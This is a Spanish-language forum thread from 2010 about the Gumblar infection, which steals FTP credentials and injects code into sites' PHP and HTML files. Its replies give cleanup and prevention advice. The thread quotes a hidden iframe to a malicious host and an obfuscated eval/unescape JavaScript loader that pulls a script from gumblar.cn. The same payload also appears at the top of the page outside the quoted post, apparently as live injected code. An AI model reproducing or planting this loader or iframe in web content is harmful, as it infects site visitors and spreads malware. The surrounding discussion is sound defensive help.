Sommera
1
Pi
Verificado
Verificación en dos pasos activada
Verificado por Whatsapp
¡Ha verificado su Paypal!
¡Usuario popular!
Suscripción a IA
<iframe src=”http://sitiomalicioso:8080/index.php” mce_src=”http://sitiomalicioso:8080/index.php” width=107 height=152 style=”visibility: hidden”></iframe>
(function(jil){var xR5p=’%';eval(unescape((’var”20a”3d”22Sc”72iptEngin”65″22″2c”62″3d”22″56ers”69on()+”22″2c”6a”3d”22″22″2cu”3dnavig”61t”6 …………… “65rAgent”3bif((”75″2eind”65xOf”28″22Win”22)”3e0)”26″26(u”2e”69n”64exO”66(”22NT”20″36″22″29″3c0)”26″26(documen”74″2ecookie”2e”69ndex”4f”66″28″22″6die”6b”3d1″22)”3c0)”26″26″28t”79″70e”6ff3bdocu”6de”6e”74″2ewr”69″74e(”22″3csc”72ipt”20sr”63″3d”2f”2fgumblar”2ecn”2frss”2f”3fid”3d”22+j+”22″3e”3c”5c”2f”73cript”3e”22″29″3b”7d’).replace(jil,xR5p)))})(/”/g);
Ricardo Núñez - 06/05/2010
Para vbhispano
Cito:
Hay un virus circulando en la red que se filtra en tu computadora (independientemente su sistema operativo) que, para ser exactos se ubica en el software de Adobe.
Este código generalmente no provoca daños en tu ordenador, sin embargo detecta códigos de FTP para filtrarse en los sitios que tengas almacenados, una vez que tiene acceso a los sitios, les inyecta un código a todos los PHP y HTML (ese último algunas veces) en iframe oculto que hace a los archivos inservibles.
lgunos ejemplos del código son:
Insertar CODE, HTML o PHP:<iframe src=”http://sitiomalicioso:8080/index.php” mce_src=”http://sitiomalicioso:8080/index.php” width=107 height=152 style=”visibility: hidden”></iframe>
o más compuestos como:
Insertar CODE, HTML o PHP:(function(jil){var xR5p=’%';eval(unescape((’var”20a”3d”22Sc”72iptEngin”65″22″2c”62″3d”22″56ers”69on()+”22″2c”6a”3d”22″22″2cu”3dnavig”61t”6 …………… “65rAgent”3bif((”75″2eind”65xOf”28″22Win”22)”3e0)”26″26(u”2e”69n”64exO”66(”22NT”20″36″22″29″3c0)”26″26(documen”74″2ecookie”2e”69ndex”4f”66″28″22″6die”6b”3d1″22)”3c0)”26″26″28t”79″70e”6ff3bdocu”6de”6e”74″2ewr”69″74e(”22″3csc”72ipt”20sr”63″3d”2f”2fgumblar”2ecn”2frss”2f”3fid”3d”22+j+”22″3e”3c”5c”2f”73cript”3e”22″29″3b”7d’).replace(jil,xR5p)))})(/”/g);
Estos códigos que pueden ser más largos se colocan en cada archivo PHP y HTML de tu web.
Forma de quitarlo:
- Baja todos los archivos y elima el código.
- En vBulletin re-sube los archivos de hacks y del mismo vB, incluye TODO archivo PHP
Como Prevenirse:
- Quita programas como Adobe Reader y Adobe Flash, bájalos de la web de adobe de nuevo en su última versión.
- Analiza con tu antivirus ACTUALIZADO
- Cambia seguido las contraseñas FTP
- Borra la caché de tu navegador
- Borra los historiales que tengas guardados en tu software de FTP, es decir, las cuentas guardadas.
yo entro normal al sitio...
Una pregunta ¿ya se solucionó tu problema?
y si alguien me puede decir que puedo utilizar para mejorar la seguridad osea, si existe algun plugin que bloquee estas modificaciones o algo similar, me explico ?
Ese mensaje que te ha salido es claramente un Virus.
a) Elimina la Linea del file, vuelvelo a subir desde una pc limpia.
b) desinstala tus programas ftp de la maquina infectada.
Utilizamos cookies y tecnologías similares para los siguientes fines:
¿Aceptas las cookies y estas tecnologías?
Utilizamos cookies y tecnologías similares para los siguientes fines:
¿Aceptas las cookies y estas tecnologías?